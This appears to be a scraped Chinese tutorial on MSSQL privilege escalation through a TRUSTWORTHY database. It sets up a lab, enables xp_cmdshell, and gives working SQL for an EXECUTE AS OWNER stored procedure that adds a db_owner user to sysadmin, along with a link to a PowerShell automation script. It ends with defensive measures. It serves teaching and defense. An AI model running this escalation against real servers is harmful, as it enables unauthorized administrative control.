MSSQL受信用数据库提权技术详解<\/h1>

0x01 前提条件<\/h2>

要进行MSSQL受信用数据库提权，需要满足以下条件：<\/p>

已获取一个SQL Server用户的凭据（用户名和密码）<\/li>
该用户对某个数据库拥有db_owner<\/code>权限<\/li>

该数据库被设置为TRUSTWORTHY<\/code>（受信用）<\/li>
<\/ol>
0x02 环境准备<\/h2>
1. 创建测试数据库<\/h3>
CREATE<\/span> DATABASE<\/span> MyTestdb01
<\/span><\/span>SELECT<\/span> suser_sname(owner_sid) FROM<\/span> sys.databases WHERE<\/span> name =<\/span> 'MyTestdb01'<\/span>
<\/span><\/span><\/code><\/pre>2. 创建测试用户<\/h3>
CREATE<\/span> LOGIN MyAppUser01 WITH<\/span> PASSWORD =<\/span> 'MyPassword!'<\/span>;
<\/span><\/span><\/code><\/pre>此时用户默认为public<\/code>角色<\/p>
3. 分配db_owner权限<\/h3>
USE MyTestdb01
<\/span><\/span>ALTER<\/span> LOGIN [MyAppUser01] with<\/span> default_database =<\/span> [MyTestdb01];
<\/span><\/span>CREATE<\/span> USER<\/span> [MyAppUser01] FROM<\/span> LOGIN [MyAppUser01];
<\/span><\/span>EXEC<\/span> sp_addrolemember [db_owner], [MyAppUser01];
<\/span><\/span><\/code><\/pre>4. 验证用户权限<\/h3>
SELECT<\/span> rp.name as<\/span> database_role, mp.name as<\/span> database_user
<\/span><\/span>FROM<\/span> sys.database_role_members drm
<\/span><\/span>JOIN<\/span> sys.database_principals rp ON<\/span> (drm.role_principal_id =<\/span> rp.principal_id)
<\/span><\/span>JOIN<\/span> sys.database_principals mp ON<\/span> (drm.member_principal_id =<\/span> mp.principal_id)
<\/span><\/span><\/code><\/pre>5. 设置数据库为受信用<\/h3>
ALTER<\/span> DATABASE<\/span> MyTestdb01 SET<\/span> TRUSTWORTHY ON<\/span>
<\/span><\/span><\/code><\/pre>6. 验证数据库信任状态<\/h3>
SELECT<\/span> a.name,b.is_trustworthy_on
<\/span><\/span>FROM<\/span> master..sysdatabases as<\/span> a
<\/span><\/span>INNER<\/span> JOIN<\/span> sys.databases as<\/span> b
<\/span><\/span>ON<\/span> a.name=<\/span>b.name;
<\/span><\/span><\/code><\/pre>结果中1<\/code>表示受信用<\/p>
7. 启用xp_cmdshell（可选）<\/h3>
EXEC<\/span> sp_configure 'show advanced options'<\/span>,1<\/span>
<\/span><\/span>RECONFIGURE
<\/span><\/span>GO<\/span>
<\/span><\/span>EXEC<\/span> sp_configure 'xp_cmdshell'<\/span>,1<\/span>
<\/span><\/span>RECONFIGURE
<\/span><\/span>GO<\/span>
<\/span><\/span><\/code><\/pre>0x03 提权过程<\/h2>
1. 确认当前权限<\/h3>
使用MyAppUser01用户登录后，检查当前权限：<\/p>
SELECT<\/span> IS_SRVROLEMEMBER('sysadmin'<\/span>)
<\/span><\/span><\/code><\/pre>2. 创建提权存储过程<\/h3>
USE MyTestdb01
<\/span><\/span>GO<\/span>
<\/span><\/span>CREATE<\/span> PROCEDURE<\/span> sp_elevate_me
<\/span><\/span>WITH<\/span> EXECUTE<\/span> AS<\/span> OWNER<\/span>
<\/span><\/span>AS<\/span>
<\/span><\/span>EXEC<\/span> sp_addsrvrolemember 'MyAppUser01'<\/span>,'sysadmin'<\/span>
<\/span><\/span>GO<\/span>
<\/span><\/span><\/code><\/pre>关键点：<\/p>

WITH EXECUTE AS OWNER<\/code>：使存储过程以数据库所有者身份执行<\/li>
sp_addsrvrolemember<\/code>：将用户添加到服务器角色<\/li>
<\/ul>
3. 执行提权<\/h3>
USE MyTestdb01
<\/span><\/span>EXEC<\/span> sp_elevate_me
<\/span><\/span><\/code><\/pre>4. 验证提权结果<\/h3>
SELECT<\/span> IS_SRVROLEMEMBER('sysadmin'<\/span>)
<\/span><\/span><\/code><\/pre>或查看用户属性确认已获得sysadmin<\/code>权限<\/p>
0x04 自动化工具<\/h2>
可使用PowerShell脚本自动化此过程：<\/p>
Invoke-SqlServer-Escalate-Dbowner -SqlUser MyAppUser01 -SqlPass "MyPassword!"<\/span> -SqlServerInstance WIN-80LVKKRM5UA
<\/span><\/span><\/code><\/pre>脚本地址：https:\/\/raw.githubusercontent.com\/nullbind\/Powershellery\/master\/Stable-ish\/MSSQL\/Invoke-SqlServer-Escalate-Dbowner.psm1<\/p>
0x05 技术原理<\/h2>

TRUSTWORTHY属性<\/strong>：当数据库设置为TRUSTWORTHY时，其所有者（通常是sysadmin）授予该数据库中的代码执行权限<\/li>
EXECUTE AS OWNER<\/strong>：允许存储过程以数据库所有者身份执行，而所有者通常是sysadmin<\/li>
权限链<\/strong>：通过存储过程调用系统存储过程(sp_addsrvrolemember)时，会继承所有者权限<\/li>
<\/ol>
0x06 防御措施<\/h2>

限制db_owner权限的分配<\/li>
避免设置TRUSTWORTHY ON，除非绝对必要<\/li>
使用代码签名替代TRUSTWORTHY<\/li>
定期审计数据库权限设置<\/li>
监控可疑的权限变更操作<\/li>
<\/ol>
参考资源<\/h2>

SQL Server Under Attack<\/a><\/li>
Privilege Escalation via Trustworthy Database<\/a><\/li>
Hacking SQL Server Stored Procedures<\/a><\/li>
<\/ol>

MSSQL受信用数据库提权技术详解<\/h1>

0x02 环境准备<\/h2>

0x03 提权过程<\/h2>

参考资源<\/h2> SQL Server Under Attack<\/a><\/li> Privilege Escalation via Trustworthy Database<\/a><\/li> Hacking SQL Server Stored Procedures<\/a><\/li> <\/ol>

参考资源<\/h2>

SQL Server Under Attack<\/a><\/li>
Privilege Escalation via Trustworthy Database<\/a><\/li>
Hacking SQL Server Stored Procedures<\/a><\/li> <\/ol>